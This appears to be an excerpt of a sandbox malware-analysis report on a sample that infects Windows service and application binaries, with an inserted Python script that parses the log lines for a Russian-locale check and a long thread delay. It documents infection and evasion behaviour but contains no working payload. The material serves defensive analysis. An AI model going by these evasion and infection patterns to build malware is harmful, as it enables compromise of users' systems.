              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match File source: Process Memory Space: MUH030425.exe PID: 6244, type: MEMORYSTR
              Source: C:\Windows\System32\AppVClient.exe Code function: 17_2_00B752A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 17_2_00B752A0
              Source: C:\Windows\System32\FXSSVC.exe Code function: 21_2_004252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 21_2_004252A0
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 22_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 22_2_009952A0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 23_2_00C052A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 23_2_00C052A0
              Source: C:\Windows\System32\msdtc.exe Code function: 24_2_00C952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 24_2_00C952A0
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Code function: 25_2_004C52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 25_2_004C52A0
              Source: C:\Windows\System32\Locator.exe Code function: 27_2_007452A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 27_2_007452A0
              Source: C:\Windows\System32\SensorDataService.exe Code function: 29_2_004A52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 29_2_004A52A0
              Source: C:\Windows\System32\snmptrap.exe Code function: 30_2_006C52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 30_2_006C52A0
              Source: C:\Windows\System32\Spectrum.exe Code function: 31_2_004A52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 31_2_004A52A0
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Code function: 32_2_00D752A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 32_2_00D752A0
              Source: C:\Windows\System32\TieringEngineService.exe Code function: 34_2_006D52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 34_2_006D52A0
              Source: C:\Windows\System32\AgentService.exe Code function: 36_2_00B852A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 36_2_00B852A0
              Source: C:\Windows\System32\vds.exe Code function: 37_2_00C252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 37_2_00C252A0
              Source: C:\Windows\System32\wbengine.exe Code function: 39_2_007652A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 39_2_007652A0
              Source: C:\Users\user\Desktop\MUH030425.exe Memory allocated: 11B0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\MUH030425.exe Memory allocated: 2B50000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\MUH030425.exe Memory allocated: 11D0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\MUH030425.exe Memory allocated: 64F0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\MUH030425.exe Memory allocated: 61F0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\MUH030425.exe Memory allocated: 74F0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\MUH030425.exe Memory allocated: 84F0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Memory allocated: 2F00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Memory allocated: 30C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Memory allocated: 50C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Memory allocated: 6C30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Memory allocated: 6830000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Memory allocated: 7C30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe Memory allocated: 8C30000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00416B94 LoadLibraryA, GetProcAddress, LoadLibraryA, GetProcAddress, LoadLibraryA, GetProcAddress, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, GetCurrentProcessId, 8_2_00416B94
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3587
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3382
              Source: C:\Windows\System32\msdtc.exe Window / User API: threadDelayed 487
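              Two of the signature lines above carry more information than they show at first glance: the GetSystemDefaultLangID / lea ecx, [eax-419h] pattern reported at the same-looking address in every infected service image, and the PowerShell "delay time" value. The following Python is an added triage example, not part of the Joe Sandbox report and not Azorult's own code. Its sample lines are copied from this section with a space inserted between the source path and the event text; the LANGID constants are the winnt.h values; the 60-second long-sleep threshold is the example's own assumption.

```python
import re

# Constructed sample: signature lines copied from this report section, with the
# sandbox's source path and event text separated by a space.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\AppVClient.exe Code function: 17_2_00B752A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] 17_2_00B752A0",
    r"Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 23_2_00C052A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] 23_2_00C052A0",
    r"Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Code function: 32_2_00D752A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] 32_2_00D752A0",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477",
]

# Primary language identifiers from winnt.h. LANGID = (sublang << 10) | primary,
# so 0x0419 is SUBLANG_DEFAULT (1) of LANG_RUSSIAN (0x19): ru-RU.
PRIMARY_LANG = {0x19: "LANG_RUSSIAN", 0x22: "LANG_UKRAINIAN",
                0x23: "LANG_BELARUSIAN", 0x3F: "LANG_KAZAK"}

# .NET TimeSpan: 100 ns ticks, 10,000 per millisecond, at most Int64.MaxValue ticks.
TIMESPAN_MAX_MS = ((1 << 63) - 1) // 10_000     # 922337203685477

LOCALE_RE = re.compile(
    r"Source: (?P<path>.+?)\s*Code function: \d+_\d+_(?P<addr>[0-9A-Fa-f]{8}) "
    r"GetSystemDefaultLangID,.*?lea ecx, dword ptr \[eax-(?P<disp>[0-9A-Fa-f]+)h\]")
DELAY_RE = re.compile(
    r"Source: (?P<path>.+?)\s*Thread delayed: delay time: (?P<ms>\d+)")


def decode_langid(langid):
    """Split a Windows LANGID into (primary-language name, sublanguage id)."""
    primary, sublang = langid & 0x3FF, langid >> 10
    return PRIMARY_LANG.get(primary, f"LANG_0x{primary:02X}"), sublang


def classify_delay(ms):
    """'delay time' values are milliseconds. A value equal to TimeSpan.MaxValue is
    an unbounded wait on a handle or timer, not a tuned sleep of N seconds."""
    if ms >= TIMESPAN_MAX_MS:
        return "unbounded"
    return "long-sleep" if ms >= 60_000 else "short"   # 60 s threshold: assumption


def parse_events(lines):
    """Turn each recognised signature line into a structured event; skip the rest."""
    events = []
    for line in lines:
        if m := LOCALE_RE.search(line):
            # lea ecx,[eax-N] after GetSystemDefaultLangID computes (langid - N);
            # the branch that follows tests that difference for zero.
            langid = int(m["disp"], 16)
            name, sub = decode_langid(langid)
            events.append({"kind": "locale-check", "path": m["path"],
                           "addr": int(m["addr"], 16), "langid": langid,
                           "language": name, "sublang": sub})
        elif m := DELAY_RE.search(line):
            ms = int(m["ms"])
            events.append({"kind": "thread-delay", "path": m["path"],
                           "ms": ms, "class": classify_delay(ms)})
    return events


def shared_low_bits(addrs, mask=0xFFFF):
    """Low address bits common to every function, or None. Identical low 16 bits
    across different images means each was reached at the same offset from a
    64 KiB-aligned base, consistent with the same code planted in every binary."""
    offsets = {a & mask for a in addrs}
    return offsets.pop() if len(offsets) == 1 else None


def summarize(lines):
    events = parse_events(lines)
    locale = [e for e in events if e["kind"] == "locale-check"]
    delays = [e for e in events if e["kind"] == "thread-delay"]
    return {
        "infected_images": [e["path"] for e in locale],
        "languages_checked": sorted({e["language"] for e in locale}),
        "shared_offset": shared_low_bits(e["addr"] for e in locale),
        "unbounded_waits": sum(d["class"] == "unbounded" for d in delays),
        "long_sleeps": [d for d in delays if d["class"] == "long-sleep"],
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

              Run against the lines in this section, the summary reports a single language checked (LANG_RUSSIAN, sublanguage 1, i.e. ru-RU), a shared low address value of 0x52A0 across the infected images, and that the PowerShell delay is TimeSpan.MaxValue in milliseconds rather than a timed sleep; only entries classified as long-sleep are worth reading as timing evasion.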
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-environment-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-convert-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-memory-l1-1-0.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-filesystem-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-interlocked-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-stdio-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-libraryloader-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-runtime-l1-1-0.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-conio-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-console-l1-1-0.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-debug-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-utility-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-multibyte-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-string-l1-1-0.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-util-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{9DD40E31-8782-438B-BCFD-713DE1B3090F}\117.0.5938.134_117.0.5938.132_chrome_updater.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-profile-l1-1-0.dll
              Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\nss3.dll
